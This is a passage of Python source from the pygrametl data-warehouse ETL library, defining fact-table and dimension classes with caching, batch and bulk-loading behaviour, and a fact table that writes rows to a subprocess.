self.rowlookupsql = self.alljoinssql + " WHERE %s.%s = %%(%s)s" % \
(self.root.name, self.root.key, self.root.key)
self.levels = {}
self.__buildlevels(self.root, 0)
self.levellist = list(range(len(self.levels)))
self.levellist.reverse()
self.expectboguskeyvalues = expectboguskeyvalues
def __buildlevels(self, node, level):
tmp = self.levels.get(level, [])
tmp.append(node)
self.levels[level] = tmp
for ref in self.refs.get(node, []):
self.__buildlevels(ref, level + 1)
def lookup(self, row, namemapping={}):
"""Find the key for the row with the given values.
Arguments:
- row: a dict which must contain at least the lookup attributes
which all must come from the root (the table closest to the
fact table).
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_lookup(row, namemapping)
if res:
return res
res = self.root.lookup(row, namemapping)
self._after_lookup(row, namemapping, res)
return res
def _before_lookup(self, row, namemapping):
return None
def _after_lookup(self, row, namemapping, resultkeyvalue):
pass
def getbykey(self, keyvalue, fullrow=False):
"""Lookup and return the row with the given key value.
If no row is found in the dimension table, the function returns
a row where all values (including the key) are None.
Arguments:
- keyvalue: the key value of the row to lookup
- fullrow: a flag deciding if the full row (with data from
all tables in the snowflake) should be returned. If False,
only data from the lowest level in the hierarchy (i.e., the table
the closest to the fact table) is returned. Default: False
"""
res = self._before_getbykey(keyvalue, fullrow)
if res:
return res
if not fullrow:
res = self.root.getbykey(keyvalue)
else:
self.targetconnection.execute(self.rowlookupsql,
{self.root.key: keyvalue})
res = self.targetconnection.fetchone(self.allnames)
self._after_getbykey(keyvalue, res, fullrow)
return res
def _before_getbykey(self, keyvalue, fullrow=False):
return None
def _after_getbykey(self, keyvalue, resultrow, fullrow=False):
pass
def getbyvals(self, values, namemapping={}, fullrow=False):
"""Return a list of all rows with values identical to the given.
Arguments:
- values: a dict which must hold a subset of the tables attributes.
All rows that have identical values for all attributes in this
dict are returned.
- namemapping: an optional namemapping (see module's documentation)
- fullrow: a flag deciding if the full row (with data from
all tables in the snowflake) should be returned. If False,
only data from the lowest level in the hierarchy (i.e., the table
the closest to the fact table) is returned. Default: False
"""
res = self._before_getbyvals(values, namemapping)
if res is not None:
return res
if not fullrow:
res = self.root.getbyvals(values, namemapping)
else:
# select all attributes from the table.
# The attributes available from the
# values dict are used in the WHERE clause.
attstouse = [a for a in self.allnames
if a in values or a in namemapping]
sqlwhere = " WHERE " + \
" AND ".join(["%s = %%(%s)s" % (att, att) for att in attstouse])
self.targetconnection.execute(self.alljoinssql + sqlwhere,
values, namemapping)
res = [r for r in self.targetconnection.rowfactory(self.allnames)]
self._after_getbyvals(values, namemapping, res)
return res
def _before_getbyvals(self, values, namemapping, fullrow=False):
return None
def _after_getbyvals(self, values, namemapping, resultrows, fullrow=False):
pass
def update(self, row, namemapping={}):
"""Update rows in the participating dimension tables.
If the key of a participating dimension D is in the given row,
D.update(...) is invoked.
Note that this function is not good to use for updating a foreign
key which here has the same name as the referenced primary key: The
referenced table could then also get updated unless it is ensured
that none of its attributes are present in the given row.
In other words, it is often better to use the update function
directly on the Dimensions that should be updated.
Arguments:
- row: a dict. If the key of a participating dimension D is in the
dict, D.update(...) is invoked.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_update(row, namemapping)
if res is not None:
return
for l in self.levellist:
for t in self.levels[l]:
if t.key in row or \
(t.key in namemapping and namemapping[t.key] in row):
t.update(row, namemapping)
self._after_update(row, namemapping)
def _before_update(self, row, namemapping):
return None
def _after_update(self, row, namemapping):
pass
def ensure(self, row, namemapping={}):
"""Lookup the given member. If that fails, insert it. Return key value.
If the member must be inserted, data is automatically inserted in
all participating tables where (part of) the member is not
already represented.
Key values for different levels may be added to the row. It is
NOT guaranteed that key values for all levels exist in row
afterwards.
Arguments:
- row: the row to lookup or insert. Must contain the lookup
attributes.
- namemapping: an optional namemapping (see module's documentation)
"""
(key, ignored) = self.__ensure_helper(self.root, row, namemapping,
False)
return key
def insert(self, row, namemapping={}):
"""Insert the given member. If that fails, insert it. Return key value.
Data is automatically inserted in all participating tables where
(part of) the member is not already represented. If nothing is
inserted at all, a ValueError is raised.
Key values for different levels may be added to the row. It is
NOT guaranteed that key values for all levels exist in row
afterwards.
Arguments:
- row: the row to lookup or insert. Must contain the lookup
attributes.
- namemapping: an optional namemapping (see module's documentation)
"""
key = self._before_insert(row, namemapping)
if key is not None:
return key
(key, insertdone) = self.__ensure_helper(self.root, row, namemapping,
False)
if not insertdone:
raise ValueError("Member already present - nothing inserted")
self._after_insert(row, namemapping, key)
return key
def _before_insert(self, row, namemapping):
return None
def _after_insert(self, row, namemapping, newkeyvalue):
pass
def endload(self):
"""Finalize the load."""
pass
def __ensure_helper(self, dimension, row, namemapping, insertdone):
""" """
# NB: Has side-effects: Key values are set for all dimensions
key = None
retry = False
try:
key = dimension.lookup(row, namemapping)
except KeyError:
retry = True # it can happen that the keys for the levels above
# aren't there yet but should be used as lookup
# attributes in dimension.
# Below we find them and we should then try a
# lookup again before we move on to do an insertion
if key is not None:
row[(namemapping.get(dimension.key) or dimension.key)] = key
return (key, insertdone)
# Else recursively get keys for refed tables and then insert
for refed in self.refs.get(dimension, []):
(key, insertdone) = self.__ensure_helper(refed, row, namemapping,
insertdone)
# We don't need to set the key value in the row as this already
# happened in the recursive step.
# We set insertdone = True to know later that we actually
# inserted something
if retry or self.expectboguskeyvalues:
# The following is similar to
# key = dimension.ensure(row, namemapping)
# but we set insertdone here.
key = dimension.lookup(row, namemapping)
if key is None:
key = dimension.insert(row, namemapping)
insertdone = True
else:
# We don't need to lookup again since no attributes were
# missing (no KeyError) and we don't expect bogus values.
# So we can proceed directly to do an insert.
key = dimension.insert(row, namemapping)
insertdone = True
row[(namemapping.get(dimension.key) or dimension.key)] = key
return (key, insertdone)
def scdensure(self, row, namemapping={}):
"""Lookup or insert a version of a slowly changing dimension member.
.. Warning::
Still experimental!!! For now we require that only the
root is a SlowlyChangingDimension.
.. Note:: Has side-effects on the given row.
Arguments:
- row: a dict containing the attributes for the member.
- namemapping: an optional namemapping (see module's documentation)
"""
# Still experimental!!! For now we require that only the
# root is a SlowlyChangingDimension.
# If we were to allow other nodes to be SCDs, we should require
# that those between those nodes and the root (incl.) were also
# SCDs.
for dim in self.levels.get(1, []):
(keyval, ignored) = self.__ensure_helper(dim, row, namemapping,
False)
row[(namemapping.get(dim.key) or dim.key)] = keyval
row[(namemapping.get(self.root.key) or self.root.key)] = \
self.root.scdensure(row, namemapping)
return row[(namemapping.get(self.root.key) or self.root.key)]
class FactTable(object):
"""A class for accessing a fact table in the DW."""
def __init__(self, name, keyrefs, measures=(), targetconnection=None):
"""Arguments:
- name: the name of the fact table in the DW
- keyrefs: a sequence of attribute names that constitute the
primary key of the fact tables (i.e., the dimension references)
- measures: a possibly empty sequence of measure names. Default: ()
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
if targetconnection is None:
targetconnection = pygrametl.getdefaulttargetconnection()
self.targetconnection = targetconnection
self.name = name
self.keyrefs = keyrefs
self.measures = measures
self.all = [k for k in keyrefs] + [m for m in measures]
pygrametl._alltables.append(self)
# Create SQL
# INSERT INTO name (key1, ..., keyn, meas1, ..., measn)
# VALUES (%(key1)s, ..., %(keyn)s, %(meas1)s, ..., %(measn)s)
self.insertsql = "INSERT INTO " + name + "(" + \
", ".join(self.all) + ") VALUES (" + \
", ".join(["%%(%s)s" % (att,) for att in self.all]) + ")"
# SELECT key1, ..., keyn, meas1, ..., measn FROM name
# WHERE key1 = %(key1)s AND ... keyn = %(keyn)s
self.lookupsql = "SELECT " + ",".join(self.all) + " FROM " + name + \
" WHERE " + " AND ".join(["%s = %%(%s)s" % (k, k)
for k in self.keyrefs])
def insert(self, row, namemapping={}):
"""Insert a fact into the fact table.
Arguments:
- row: a dict at least containing values for the keys and measures.
- namemapping: an optional namemapping (see module's documentation)
"""
tmp = self._before_insert(row, namemapping)
if tmp:
return
self.targetconnection.execute(self.insertsql, row, namemapping)
self._after_insert(row, namemapping)
def _before_insert(self, row, namemapping):
return None
def _after_insert(self, row, namemapping):
pass
def _emptyfacttonone(self, argdict):
"""Return None if the given argument only contains None values,
otherwise return the given argument
"""
for k in self.keyrefs:
if argdict[k] is not None:
return argdict
return None
def lookup(self, keyvalues, namemapping={}):
"""Lookup a fact from the given key values. Return key and measure vals.
Return None if no fact is found.
Arguments:
- keyvalues: a dict at least containing values for all keys
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_lookup(keyvalues, namemapping)
if res:
return self._emptyfacttonone(res)
self.targetconnection.execute(self.lookupsql, keyvalues, namemapping)
res = self.targetconnection.fetchone(self.all)
self._after_lookup(keyvalues, namemapping, res)
return self._emptyfacttonone(res)
def _before_lookup(self, keyvalues, namemapping):
return None
def _after_lookup(self, keyvalues, namemapping, resultrow):
pass
def ensure(self, row, compare=False, namemapping={}):
"""Ensure that a fact is present (insert it if it is not already there).
Arguments:
- row: a dict at least containing the attributes of the fact table
- compare: a flag deciding if measure vales from a fact that was
looked up are compared to those in the given row. If True and
differences are found, a ValueError is raised. Default: False
- namemapping: an optional namemapping (see module's documentation)
"""
res = self.lookup(row, namemapping)
if not res:
self.insert(row, namemapping)
return False
elif compare:
for m in self.measures:
if m in row and row[m] != res.get(m):
raise ValueError(
"The existing fact has different measure values")
return True
def endload(self):
"""Finalize the load."""
pass
class BatchFactTable(FactTable):
"""A class for accessing a fact table in the DW. This class performs
performs insertions in batches.
"""
def __init__(self, name, keyrefs, measures=(), batchsize=10000,
targetconnection=None):
"""Arguments:
- name: the name of the fact table in the DW
- keyrefs: a sequence of attribute names that constitute the
primary key of the fact tables (i.e., the dimension references)
- measures: a possibly empty sequence of measure names. Default: ()
- batchsize: an int deciding many insert operations should be done
in one batch. Default: 10000
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
FactTable.__init__(self,
name=name,
keyrefs=keyrefs,
measures=measures,
targetconnection=targetconnection)
self.__batchsize = batchsize
self.__batch = []
def _before_insert(self, row, namemapping):
self.__batch.append(pygrametl.project(self.all, row, namemapping))
if len(self.__batch) == self.__batchsize:
self.__insertnow()
return True # signal that we did something
def _before_lookup(self, keyvalues, namemapping):
self.__insertnow()
def endload(self):
"""Finalize the load."""
self.__insertnow()
def __insertnow(self):
if self.__batch:
self.targetconnection.executemany(self.insertsql, self.__batch)
self.__batch = []
class _BaseBulkloadable(object):
"""Common functionality for bulkloadable tables"""
def __init__(self, name, atts, bulkloader,
fieldsep='\t', rowsep='\n', nullsubst=None,
tempdest=None, bulksize=500000, usefilename=False,
encoding=None, dependson=()):
r"""Arguments:
- name: the name of the table in the DW
- atts: a sequence of the bulkloadable tables' attribute names
- bulkloader: A method
m(name, attributes, fieldsep, rowsep, nullsubst, tempdest) that
is called to load data from a temporary file into the DW. The
argument "attributes" is a list of the names of the columns to
insert values into and show the order in which the attribute
values appear in the temporary file. The rest of the arguments
are similar to those arguments with identical names that are given
to _BaseBulkloadable.__init__ as described here. The argument
"tempdest" can, however, be 1) a string with a filename or
2) a file object. This is determined by the usefilename argument to
_BaseBulkloadable.__init__ (see below).
- fieldsep: a string used to separate fields in the temporary
file. Default: '\t'
- rowsep: a string used to separate rows in the temporary file.
Default: '\n'
- nullsubst: an optional string used to replace None values.
If nullsubst=None, no substitution takes place. Default: None
- tempdest: a file object or None. If None a named temporary file
is used. Default: None
- bulksize: an int deciding the number of rows to load in one
bulk operation. Default: 500000
- usefilename: a value deciding if the file should be passed to the
bulkloader by its name instead of as a file-like object.
Default: False
- encoding: a string with the encoding to use. If None,
locale.getpreferredencoding() is used. This argument is
ignored under Python 2! Default: None
- dependson: a sequence of other bulkloadble tables that should
be loaded before this instance does bulkloading (e.g., if
a fact table has foreign keys to some bulkloaded dimension tables).
Default: ()
"""
self.name = name
self.atts = atts
self.__close = False
if tempdest is None:
self.__close = True
self.__namedtempfile = tempfile.NamedTemporaryFile()
tempdest = self.__namedtempfile.file
self.fieldsep = fieldsep
self.rowsep = rowsep
self.nullsubst = nullsubst
self.bulkloader = bulkloader
self.tempdest = tempdest
self.bulksize = bulksize
self.usefilename = usefilename
if encoding is not None:
self.encoding = encoding
else:
self.encoding = locale.getpreferredencoding()
self.dependson = dependson
if version_info[0] == 2:
# Python 2: We ignore the specified encoding
self._tobytes = lambda data, encoding: str(data)
else:
# Python 3: We make _tobytes use the specified encoding:
self._tobytes = lambda data, encoding: bytes(data, encoding)
self.__count = 0
self.__ready = True
def __preparetempfile(self):
self.__namedtempfile = tempfile.NamedTemporaryFile()
self.tempdest = self.__namedtempfile.file
self.__ready = True
def _insertwithnulls(self, row, namemapping={}):
"""Insert (eventually) a row into the table.
Arguments:
- row: a dict at least containing values for each of the tables'
attributes.
- namemapping: an optional namemapping (see module's documentation)
"""
if not self.__ready:
self.__preparetempfile()
rawdata = [row[namemapping.get(att) or att] for att in self.atts]
data = [pygrametl.getstrornullvalue(val, self.nullsubst)
for val in rawdata]
self.__count += 1
self.tempdest.write(
self._tobytes(
"%s%s" % (self.fieldsep.join(data), self.rowsep),
self.encoding))
if self.__count == self.bulksize:
self._bulkloadnow()
def _insertwithoutnulls(self, row, namemapping={}):
"""Insert (eventually) a row into the table.
Arguments:
- row: a dict at least containing values for each of the tables'
attributes.
- namemapping: an optional namemapping (see module's documentation)
"""
if not self.__ready:
self.__preparetempfile()
data = [str(row[namemapping.get(att) or att]) for att in self.atts]
self.__count += 1
self.tempdest.write(
self._tobytes("%s%s" % (self.fieldsep.join(data), self.rowsep),
self.encoding))
if self.__count == self.bulksize:
self._bulkloadnow()
def _bulkloadnow(self):
if self.__count == 0:
return
for b in self.dependson:
if hasattr(b, '_bulkloadnow'):
b._bulkloadnow()
self.tempdest.flush()
self.tempdest.seek(0)
self.bulkloader(self.name, self.atts,
self.fieldsep, self.rowsep, self.nullsubst,
self.usefilename and self.__namedtempfile.name or
self.tempdest)
self.tempdest.seek(0)
self.tempdest.truncate(0)
self.__count = 0
def endload(self):
"""Finalize the load."""
self._bulkloadnow()
if self.__close:
try:
self.__namedtempfile.close()
except OSError:
pass # may happen if the instance was decoupled
self.__ready = False
def _decoupled(self):
if self.__close:
# We need to make a private tempfile
self.__namedtempfile = tempfile.NamedTemporaryFile()
self.tempdest = self.__namedtempfile.file
class BulkFactTable(_BaseBulkloadable):
"""Class for addition of facts to a fact table. Reads are not supported. """
def __init__(self, name, keyrefs, measures, bulkloader,
fieldsep='\t', rowsep='\n', nullsubst=None,
tempdest=None, bulksize=500000, usefilename=False,
encoding=None, dependson=()):
r"""Arguments:
- name: the name of the fact table in the DW
- keyrefs: a sequence of attribute names that constitute the
primary key of the fact tables (i.e., the dimension references)
- measures: a possibly empty sequence of measure names.
- bulkloader: A method
m(name, attributes, fieldsep, rowsep, nullsubst, tempdest) that
is called to load data from a temporary file into the DW. The
argument "attributes" is the combination of keyrefs and measures
(i.e., a list of the names of the columns to insert values into)
and show the order in which the attribute values appear in the
temporary file. The rest of the arguments are similar to those
arguments with identical names that are given to
BulkFactTable.__init__ as described here. The argument "tempdest"
can, however, be 1) a string with a filename or 2) a file
object. This is determined by the usefilename argument to
BulkFactTable.__init__ (see below).
- fieldsep: a string used to separate fields in the temporary
file. Default: '\t'
- rowsep: a string used to separate rows in the temporary file.
Default: '\n'
- nullsubst: an optional string used to replace None values.
If nullsubst=None, no substitution takes place. Default: None
- tempdest: a file object or None. If None a named temporary file
is used. Default: None
- bulksize: an int deciding the number of rows to load in one
bulk operation. Default: 500000
- usefilename: a value deciding if the file should be passed to the
bulkloader by its name instead of as a file-like object. This is,
e.g., necessary when the bulk loading is invoked through SQL
(instead of directly via a method on the PEP249 driver). It is
also necessary if the bulkloader runs in another process
(for example, when if the BulkFactTable is wrapped by a
DecoupledFactTable and invokes the bulkloader on a shared
connection wrapper). Default: False
- encoding: a string with the encoding to use. If None,
locale.getpreferredencoding() is used. This argument is
ignored under Python 2! Default: None
- dependson: a sequence of other bulkloadble tables that should
be bulkloaded before this instance does bulkloading (e.g., if
the fact table has foreign keys to some bulk-loaded dimension
table). Default: ()
"""
_BaseBulkloadable.__init__(self,
name=name,
atts=[k for k in keyrefs] + [m for m in measures],
bulkloader=bulkloader,
fieldsep=fieldsep,
rowsep=rowsep,
nullsubst=nullsubst,
tempdest=tempdest,
bulksize=bulksize,
usefilename=usefilename,
encoding=encoding,
dependson=dependson)
if nullsubst is None:
self.insert = self._insertwithoutnulls
else:
self.insert = self._insertwithnulls
pygrametl._alltables.append(self)
def insert(self, row, namemapping={}):
"""Insert a fact into the fact table.
Arguments:
- row: a dict at least containing values for the keys and measures.
- namemapping: an optional namemapping (see module's documentation)
"""
pass # Is set to _insertwithnulls or _inserwithoutnulls from __init__
class BulkDimension(_BaseBulkloadable, CachedDimension):
"""A class for accessing a dimension table. Does caching and bulk loading.
Unlike CachedBulkDimension, this class always caches all dimension data.
The class caches all dimension members in memory. Newly inserted
dimension members are also put into the cache. The class does not
INSERT new dimension members into the underlying database table
immediately when insert or ensure is invoked. Instead, the class does
bulk loading of new members. When a certain amount of new dimension
members have been inserted (configurable through __init__'s bulksize
argument), a user-provided bulkloader method is called.
Calls of lookup and ensure will only use the cache and does not invoke
any database operations. It is also possible to use the update and
getbyvals methods, but calls of these will invoke the bulkloader first
(and performance can degrade). If the dimension table's full rows
are cached (by setting __init__'s cachefullrow argument to True), a
call of getbykey will only use the cache, but if cachefullrows==False
(which is the default), the bulkloader is again invoked first.
We assume that the DB doesn't change or add any attribute
values that are cached.
For example, a DEFAULT value in the DB or automatic type coercion can
break this assumption.
"""
def __init__(self, name, key, attributes, bulkloader, lookupatts=(),
idfinder=None, defaultidvalue=None, rowexpander=None,
cachefullrows=False,
fieldsep='\t', rowsep='\n', nullsubst=None,
tempdest=None, bulksize=500000, usefilename=False,
encoding=None, dependson=(), targetconnection=None):
r"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument.
- bulkloader: A method
m(name, attributes, fieldsep, rowsep, nullsubst, tempdest) that
is called to load data from a temporary file into the DW. The
argument "attributes" is a list of the names of the columns to
insert values into and show the order in which the attribute
values appear in the temporary file. The rest of the arguments
are similar to those arguments with identical names that are
described below. The argument "tempdest" can, however, be
1) a string with a filename or 2) a file object. This is
determined by the usefilename argument (see below).
- lookupatts: A subset of the attributes that uniquely identify
a dimension members. These attributes are thus used for looking
up members. If not given, it is assumed that
lookupatts = attributes
- idfinder: A function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- defaultidvalue: An optional value to return when a lookup fails.
This should thus be the ID for a preloaded "Unknown" member.
- rowexpander: A function(row, namemapping) -> row. This function
is called by ensure before insertion if a lookup of the row fails.
This is practical if expensive calculations only have to be done
for rows that are not already present. For example, for a date
dimension where the full date is used for looking up rows, a
rowexpander can be set such that week day, week number, season,
year, etc. are only calculated for dates that are not already
represented. If not given, no automatic expansion of rows is
done.
- cachefullrows: a flag deciding if full rows should be
cached. If not, the cache only holds a mapping from
lookupattributes to key values. Default: False.
- fieldsep: a string used to separate fields in the temporary
file. Default: '\t'
- rowsep: a string used to separate rows in the temporary file.
Default: '\n'
- nullsubst: an optional string used to replace None values.
If nullsubst=None, no substitution takes place. Default: None
- tempdest: a file object or None. If None a named temporary file
is used. Default: None
- bulksize: an int deciding the number of rows to load in one
bulk operation. Default: 500000
- usefilename: a value deciding if the file should be passed to the
bulkloader by its name instead of as a file-like object. This is,
e.g., necessary when the bulk loading is invoked through SQL
(instead of directly via a method on the PEP249 driver). It is
also necessary if the bulkloader runs in another process.
Default: False
- dependson: a sequence of other bulkloadble tables that should
be loaded before this instance does bulkloading. Default: ()
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
- encoding: a string with the encoding to use. If None,
locale.getpreferredencoding() is used. This argument is
ignored under Python 2! Default: None
"""
_BaseBulkloadable.__init__(self,
name=name,
atts=[key] + [a for a in attributes],
bulkloader=bulkloader,
fieldsep=fieldsep,
rowsep=rowsep,
nullsubst=nullsubst,
tempdest=tempdest,
bulksize=bulksize,
usefilename=usefilename,
encoding=encoding,
dependson=dependson)
CachedDimension.__init__(self,
name=name,
key=key,
attributes=attributes,
lookupatts=lookupatts,
idfinder=idfinder,
defaultidvalue=defaultidvalue,
rowexpander=rowexpander,
size=0,
prefill=True,
cachefullrows=cachefullrows,
cacheoninsert=True,
usefetchfirst=False,
targetconnection=targetconnection)
self.emptyrow = dict(zip(self.atts, len(self.atts) * (None,)))
if nullsubst is None:
self._insert = self._insertwithoutnulls
else:
self._insert = self._insertwithnulls
def _before_getbyvals(self, values, namemapping):
self._bulkloadnow()
return None
def _before_update(self, row, namemapping):
self._bulkloadnow()
return None
def getbykey(self, keyvalue):
"""Lookup and return the row with the given key value.
If no row is found in the dimension table, the function returns
a row where all values (including the key) are None.
"""
if not self.cachefullrows:
self._bulkloadnow()
return CachedDimension.getbykey(self, keyvalue)
# else we do cache full rows and all rows are cached...
if isinstance(keyvalue, dict):
keyvalue = keyvalue[self.key]
row = self._before_getbykey(keyvalue)
if row is not None:
return row
else:
# Do not look in the DB; we cache everything
return self.emptyrow.copy()
def insert(self, row, namemapping={}):
"""Insert the given row. Return the new key value.
Arguments:
- row: the row to insert. The dict is not updated. It must contain
all attributes, and is allowed to contain more attributes than
that.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_insert(row, namemapping)
if res is not None:
return res
key = (namemapping.get(self.key) or self.key)
if row.get(key) is None:
keyval = self.idfinder(row, namemapping)
row = dict(row) # Make a copy to change
row[key] = keyval
else:
keyval = row[key]
self._insert(row, namemapping)
self._after_insert(row, namemapping, keyval)
return keyval
class CachedBulkDimension(_BaseBulkloadable, CachedDimension):
"""A class for accessing a dimension table. Does caching and bulk loading.
Unlike BulkDimension, the cache size is configurable and lookups may
thus lead to database operations.
The class caches dimension members in memory. Newly inserted
dimension members are also put into the cache. The class does not
INSERT new dimension members into the underlying database table
immediately when insert or ensure is invoked. Instead, the class does
bulk loading of new members. When a certain amount of new dimension
members have been inserted (configurable through __init__'s bulksize
argument), a user-provided bulkloader method is called.
It is also possible to use the update and getbyvals methods, but calls
of these will invoke the bulkloader first (and performance can
degrade). If the dimension table's full rows are cached (by setting
__init__'s cachefullrow argument to True), a call of getbykey will only
use the cache, but if cachefullrows==False (which is the default), the
bulkloader is again invoked first.
We assume that the DB doesn't change or add any attribute
values that are cached.
For example, a DEFAULT value in the DB or automatic type coercion can
break this assumption.
"""
def __init__(self, name, key, attributes, bulkloader, lookupatts=(),
idfinder=None, defaultidvalue=None, rowexpander=None,
usefetchfirst=False, cachefullrows=False,
fieldsep='\t', rowsep='\n', nullsubst=None,
tempdest=None, bulksize=5000, cachesize=10000,
usefilename=False, encoding=None, dependson=(),
targetconnection=None):
r"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument.
- bulkloader: A method
m(name, attributes, fieldsep, rowsep, nullsubst, tempdest) that
is called to load data from a temporary file into the DW. The
argument "attributes" is a list of the names of the columns to
insert values into and show the order in which the attribute
values appear in the temporary file. The rest of the arguments
are similar to those arguments with identical names that are
described below. The argument "tempdest" can, however, be
1) a string with a filename or 2) a file object. This is
determined by the usefilename argument (see below).
- lookupatts: A subset of the attributes that uniquely identify
a dimension members. These attributes are thus used for looking
up members. If not given, it is assumed that
lookupatts = attributes
- idfinder: A function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- defaultidvalue: An optional value to return when a lookup fails.
This should thus be the ID for a preloaded "Unknown" member.
- rowexpander: A function(row, namemapping) -> row. This function
is called by ensure before insertion if a lookup of the row fails.
This is practical if expensive calculations only have to be done
for rows that are not already present. For example, for a date
dimension where the full date is used for looking up rows, a
rowexpander can be set such that week day, week number, season,
year, etc. are only calculated for dates that are not already
represented. If not given, no automatic expansion of rows is
done.
- usefetchfirst: a flag deciding if the SQL:2008 FETCH FIRST
clause is used when prefil is True. Depending on the used DBMS
and DB driver, this can give significant savings wrt. to time and
memory. Not all DBMSs support this clause yet. Default: False
- cachefullrows: a flag deciding if full rows should be
cached. If not, the cache only holds a mapping from
lookupattributes to key values. Default: False.
- fieldsep: a string used to separate fields in the temporary
file. Default: '\t'
- rowsep: a string used to separate rows in the temporary file.
Default: '\n'
- nullsubst: an optional string used to replace None values.
If nullsubst=None, no substitution takes place. Default: None
- tempdest: a file object or None. If None a named temporary file
is used. Default: None
- bulksize: an int deciding the number of rows to load in one
bulk operation. Default: 5000
- cachesize: the maximum number of rows to cache. If less than or equal
to 0, unlimited caching is used. Default: 10000
- usefilename: a value deciding if the file should be passed to the
bulkloader by its name instead of as a file-like object. This is,
e.g., necessary when the bulk loading is invoked through SQL
(instead of directly via a method on the PEP249 driver). It is
also necessary if the bulkloader runs in another process.
Default: False
- dependson: a sequence of other bulkloadble tables that should
be loaded before this instance does bulkloading. Default: ()
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
- encoding: a string with the encoding to use. If None,
locale.getpreferredencoding() is used. This argument is
ignored under Python 2! Default: None
"""
_BaseBulkloadable.__init__(self,
name=name,
atts=[key] + [a for a in attributes],
bulkloader=bulkloader,
fieldsep=fieldsep,
rowsep=rowsep,
nullsubst=nullsubst,
tempdest=tempdest,
bulksize=bulksize,
usefilename=usefilename,
encoding=encoding,
dependson=dependson)
CachedDimension.__init__(self,
name=name,
key=key,
attributes=attributes,
lookupatts=lookupatts,
idfinder=idfinder,
defaultidvalue=defaultidvalue,
rowexpander=rowexpander,
size=cachesize,
prefill=True,
cachefullrows=cachefullrows,
cacheoninsert=True,
usefetchfirst=usefetchfirst,
targetconnection=targetconnection)
self.emptyrow = dict(zip(self.atts, len(self.atts) * (None,)))
self.__localcache = {}
self.__localkeys = {}
if nullsubst is None:
self._insert = self._insertwithoutnulls
else:
self._insert = self._insertwithnulls
def _before_lookup(self, row, namemapping):
namesinrow = [(namemapping.get(a) or a) for a in self.lookupatts]
searchtuple = tuple([row[n] for n in namesinrow])
if searchtuple in self.__localcache:
return self.__localcache[searchtuple][self.key]
return CachedDimension._before_lookup(self, row, namemapping)
def _before_getbyvals(self, values, namemapping):
self._bulkloadnow()
return None
def _before_update(self, row, namemapping):
self._bulkloadnow()
return None
def _bulkloadnow(self):
emptydict = {}
for key, row in self.__localkeys.items():
self._after_insert(row, emptydict, key)
self.__localcache.clear()
self.__localkeys.clear()
_BaseBulkloadable._bulkloadnow(self)
return
def getbykey(self, keyvalue):
"""Lookup and return the row with the given key value.
If no row is found in the dimension table, the function returns
a row where all values (including the key) are None.
"""
if isinstance(keyvalue, dict):
keyvalue = keyvalue[self.key]
if keyvalue in self.__localkeys:
return self.__localkeys[keyvalue].copy()
return CachedDimension.getbykey(self, keyvalue)
def lookup(self, row, namemapping={}):
return CachedDimension.lookup(self, row, namemapping=namemapping)
def insert(self, row, namemapping={}):
"""Insert the given row. Return the new key value.
Arguments:
- row: the row to insert. The dict is not updated. It must contain
all attributes, and is allowed to contain more attributes than
that.
- namemapping: an optional namemapping (see module's documentation)
"""
row = pygrametl.copy(row, **namemapping)
searchtuple = tuple([row[n] for n in self.lookupatts])
res = self._before_insert(row, {})
if res is not None:
return res
if row.get(self.key) is None:
keyval = self.idfinder(row, {})
row[self.key] = keyval
else:
keyval = row[self.key]
if searchtuple in self.__localcache:
return self.__localcache[searchtuple]
self._insert(row, {})
self.__localcache[searchtuple] = row
self.__localkeys[keyval] = row
return keyval
class SubprocessFactTable(object):
"""Class for addition of facts to a subprocess.
The subprocess can, e.g., be a logger or bulkloader. Reads are not
supported.
Note that a created instance can not be used when endload() has been
called (and endload() is called from pygrametl.commit()).
"""
def __init__(self, keyrefs, measures, executable,
initcommand=None, endcommand=None, terminateafter=-1,
fieldsep='\t', rowsep='\n', nullsubst=None,
buffersize=16384):
r"""Arguments:
- keyrefs: a sequence of attribute names that constitute the
primary key of the fact table (i.e., the dimension references)
- measures: a possibly empty sequence of measure names. Default: ()
- executable: The subprocess to start.
- initcommand: If not None, this command is written to the
subprocess before any data.
- endcommand: If not None, this command is written to the subprocess
after all data has been written.
- terminateafter: If greater than or equal to 0, the subprocess
is terminated after this amount of seconds after the pipe to
the subprocess is closed.
- fieldsep: a string used to separate fields in the output
sent to the subprocess. Default: '\t
- rowsep: a string used to separate rows in the output sent to the
subprocess. Default: '\n'
- nullsubst: an optional string used to replace None values.
If nullsubst=None, no substitution takes place. Default: None
"""
self.all = [k for k in keyrefs] + [m for m in measures]
self.keyrefs = keyrefs
self.measures = measures
self.endcommand = endcommand
self.terminateafter = terminateafter
self.fieldsep = fieldsep
self.rowsep = rowsep
self.nullsubst = nullsubst
self.process = Popen(executable, bufsize=buffersize, shell=True,
stdin=PIPE)
self.pipe = self.process.stdin
if nullsubst is None:
self.insert = self._insertwithoutnulls
else:
self.insert = self._insertwithnulls
if initcommand is not None:
self.pipe.write(initcommand)
pygrametl._alltables.append(self)
def insert(self, row, namemapping={}):
"""Insert a fact into the fact table.
Arguments:
- row: a dict at least containing values for the keys and measures.
- namemapping: an optional namemapping (see module's documentation)
"""
pass # Is set to _insertwithnulls or _inserwithoutnulls from __init__
def _insertwithnulls(self, row, namemapping={}):
"""Insert a fact into the fact table.
Arguments:
- row: a dict at least containing values for the keys and measures.
- namemapping: an optional namemapping (see module's documentation)
"""
rawdata = [row[namemapping.get(att) or att] for att in self.all]
data = [pygrametl.getstrornullvalue(val, self.nullsubst)
for val in rawdata]
